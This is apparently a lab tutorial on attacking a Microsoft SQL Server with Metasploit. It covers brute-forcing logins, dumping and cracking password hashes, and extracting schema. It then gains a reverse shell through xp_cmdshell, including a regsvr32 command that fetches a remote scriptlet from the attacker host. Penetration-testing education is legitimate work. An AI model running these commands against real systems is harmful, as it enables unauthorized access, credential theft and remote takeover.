Today we are performing MSSQL penetration testing using Metasploit framework in order to retrieve basic information such as database name, usernames, tables name and etc from inside SQL server running on Windows operating system. In our previous article, we had set up a Microsoft SQL server in Windows 10.
Requirement
Attacker: Kali Linux (Nmap)
Target: Windows 10 (MS SQL Server)
Let’s start!!
MSSQL Dictionary Attack
This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).
|
1 2 3 4 5 |
use auxiliary/scanner/mssql/mssql_login msf auxiliary(mssql_login) > set rhosts 192.168.1.104 msf auxiliary(mssql_login) > set user_file /root/Desktop/user.txt msf auxiliary(mssql_login) > set pass_file /root/Desktop/pass.txt msf auxiliary(mssql_login) > run |
This will perform brute force attack matching valid combination for username and password from the given dictionary.
In the specified image you can observe that we have successfully retrieve credential for two users:
Username: ignite and password: 12345
Username: sa and password: 123
Enumerate MSSQL configuration setting
This module will perform a series of configuration audits and security checks against a Microsoft SQL Server database. For this module to work, valid administrative user credentials must be supplied.
|
1 2 3 4 |
use auxiliary/admin/mssql/mssql_enum msf auxiliary(mssql_enum) > set rhost 192.168.1.104 msf auxiliary(mssql_enum) >set password admin123 msf auxiliary(mssql_enum) >run |
Above module had dumped the MSSQL configuration setting where you can observe enabled and disable functions. For example:
Xp-cmdshell is enabled which is a function of Microsoft SQL Server that allows system administrators to execute an operating system command. An attacker can inject malicious command of the file for making unauthorized access into the server.
Identifying SQL Server logins
This module can be used to obtain a list of all logins from a SQL Server with any login. Selecting all of the logins from the master..syslogins table is restricted to sysadmins. However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is pretty simple because the principal IDs assigned to logins are incremental. Once logins have been enumerated they can be verified via sp_defaultdb error analysis. This is important because not all principal IDs resolve SQL logins (some resolve to roles instead). Once logins have been enumerated, they can be used in dictionary attacks.
|
1 2 3 4 |
use auxiliary/admin/mssql/mssql_enum_sql_logins msf auxiliary(mssql_enum_sql_logins) >set rhost 192.168.1.104 msf auxiliary(mssql_enum_sql_logins) > set password admin123 msf auxiliary(mssql_enum_sql_logins) > run |
From given below image you can confirm the MSSQL Server login such as “sa” which is also sysadmin and another user “ignite”. Once you have enumerated all logins after that you can make dictionary attack for their passwords.
Identify Database owner
This module can be used to escalate privileges to sysadmin if the user has the db_owner role in a trustworthy database owned by a sysadmin user. Once the user has the sysadmin role the msssql_payload module can be used to obtain a shell on the system.
|
1 2 3 4 |
use auxiliary/admin/mssql/mssql_escalate_dbowner msf auxiliary(mssql_escalate_dbowner) > set rhost 192.168.1.104 msf auxiliary(mssql_escalate_dbowner) > set password admin123 msf auxiliary(mssql_escalate_dbowner) >run |
Above module will identify whether a specified user does have a system administrator role or not. From given below image you can perceive that “sa” is a sysadmin user.
Identify a User With admin privilege
This module can be used escalate privileges if the IMPERSONATION privilege has been assigned to the user. In most cases, this results in additional data access, but in some cases, it can be used to gain sysadmin privileges.
|
1 2 3 4 |
use auxiliary/admin/mssql/mssql_escalate_execute_as msf auxiliary(mssql_escalate_execute_as) > set rhost 192.168.1.104 msf auxiliary(mssql_escalate_execute_as) > set password admin123 msf auxiliary(mssql_escalate_execute_as) > run |
From given below image you can perceive that “sa” is a sysadmin user.
Execute SQL Statement
This module will allow for simple SQL statements to be executed against an MSSQL/MSDE instance given appropriate credentials.
|
1 2 3 4 |
use auxiliary/admin/mssql/mssql_sql msf auxiliary(mssql_sql) > set rhost 192.168.1.104 msf auxiliary(mssql_sql) > set password admin123 msf auxiliary(mssql_sql) > run |
From given below image you can observe that by default it has run an SQL statement to Select version as result it has dumped the complete detail version of SQL server. Here you can execute your own SQL statement.
Retrieve MSSQL Password Hashes of Users
This module extracts the usernames and encrypted password hashes from an MSSQL server and stores them for later cracking. This module also saves information about the server version and table names, which can be used to seed the wordlist.
|
1 2 3 4 |
use auxiliary/scanner/mssql/mssql_hashdump msf auxiliary(mssql_hashdump) > set rhosts 192.168.1.104 msf auxiliary(mssql_hashdump) > set password admin123 msf auxiliary(mssql_hashdump) > run |
From given below image you can read the hash value of password set for every database user in MMSQL server.
Cracked Password Hashes of Users
This module uses John the Ripper to identify weak passwords that have been acquired from the mssql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials.
|
1 2 |
use auxiliary/analyze/jtr_mssql_fast msf auxiliary(jtr_mssql_fast) > run |
Great!! The tool John the ripper has successfully decoded the hash value set for passwords.
Extracting MYSQL Schema Information
This module attempts to extract the schema from an MSSQL Server Instance. It will disregard builtin and example DBs such as master, model, msdb, and tempdb. The module will create a note for each DB found, and store a YAML formatted output as loot for easy reading.
|
1 2 3 4 |
use auxiliary/scanner/mssql/mssql_schemadump msf auxiliary(mssql_schemadump) > set rhosts 192.168.1.104 msf auxiliary(mssql_schemadump) > set password admin123 msf auxiliary(mssql_schemadump) > run |
Here it has dump the information schema for database “ignite” with table name “student” , 4 columns name with column types:
DB: ignite
Table name: student_details
| Ranking
(CT: Numeric ; CL =9) |
NAME
(CT: nvarchar; CL =100) |
Class
(CT: nchar; CL : =20) |
Name
(CT: sysname; CL: = 100) |
Execute malicious .dll code through xp-cmdshell as CMD statement
This module simplifies the Regsvr32.exe Application Whitelisting Bypass technique. The module creates a web server that hosts a .sct file. When the user types the provided regsvr32 command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the specified payload (similar to the web_delivery module with PSH). Both web requests (i.e., the .sct file and PowerShell download and execute) can occur on the same port.
|
1 2 3 4 |
use exploit/windows/misc/regsvr32_applocker_bypass_server msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.115 msf exploit(regsvr32_applocker_bypass_server) > set lport 4455 msf exploit(regsvr32_applocker_bypass_server) > run |
Since we known xp_cmdshell function is enabled in SQL server, therefore, we can easily shoot the target machine by injecting a malicious .dll file through xp_cmdshell function.
After executing the above module we will get the malicious .dll code as highlighted in the below image, copy this code for injecting into xp_cmdshell as a statement.
This module will execute a Windows command on an MSSQL/MSDE instance via the xp_cmdshell procedure. A valid username and password are required to use this module.
|
1 2 3 4 5 |
use auxiliary/admin/mssql/mssql_exec msf auxiliary(mssql_exec) > set rhost 192.168.1.104 msf auxiliary(mssql_exec) > set password admin123 msf auxiliary(mssql_exec) >set CMD "regsvr32 /s /n /u /i://192.168.1.115:8080/P8LsfwnWN.sct scrobj.dll" msf auxiliary(mssql_exec) >run |
If you will observe above command sets in the specified module, you will notice that here we have set above copied malicious .dll code as CMD statement. Hence as soon as we will run this exploit it creates a backdoor in victim’s machine for unauthorized access.
Wonderful!! We have got a reverse connection of the target machine through a meterpreter session.
Exploit xp_cmdshell vulnerability
This module executes an arbitrary payload on a Microsoft SQL Server by using the “xp_cmdshell” stored procedure. Currently, three delivery methods are supported. First, the original method uses Windows ‘debug.com’. File size restrictions are avoided by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems. A second method takes advantage of the Command Stager subsystem. This allows using various techniques, such as using a TFTP server, to send the executable. By default, the Command Stager uses ‘wcsript.exe’ to generate the executable on the target. Finally, ReL1K’s latest method utilizes PowerShell to transmit and recreate the payload on the target. NOTE: This module will leave an executable payload on the target system when the attack is finished.
|
1 2 3 4 5 |
use exploit/windows/mssql/mssql_payload msf exploit(mssql_payload) >set rhost 192.168.1.104 msf exploit(mssql_payload) >set password admin123 msf exploit(mssql_payload) >set srvhost 192.168.1.115 msf exploit(mssql_payload) >run |
Awesome!! We have got a reverse connection of the target machine through a meterpreter session.
Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher Contact Here